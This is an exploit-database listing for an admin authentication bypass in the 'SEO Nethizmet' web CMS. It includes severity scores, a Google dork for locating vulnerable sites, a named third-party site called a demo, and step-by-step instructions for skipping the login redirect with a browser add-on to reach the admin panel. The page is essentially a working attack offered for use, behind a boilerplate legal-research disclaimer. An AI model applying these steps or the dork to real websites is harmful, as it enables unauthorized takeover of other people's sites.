Advertisement






SEO Nethizmet Admin NoRedirect Bypass

CVE Category Price Severity
N/A CWE-352 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2022-06-28
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022060085

Below is a copy:

SEO Nethizmet Admin NoRedirect Bypass
#Exploit Title: SEO Nethizmet Admin NoRedirect Bypass
#Date: 27-06-2022
#Exploit Author: BQX (./Bertw_QX)
#Google Dork: "intext:"Web Tasarm Seo Nethizmet""
#Vendor Homepage: http://www.webdew.net/
#Category: NoRedirect
#Tested On: Kali Linux - Cyberfox

### Demo : https://dijitalkitap.com/yonetim/yonetici-giris.php

poc: 
1) Open NoRedirect
2) Add "http://localhost/yonetici/yonetici-giris.php" and confirm
3) Open http://localhost/yonetici/index.php with Cyberfox browser

------That's it, you're in the admin panel.------


*********************************************************
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum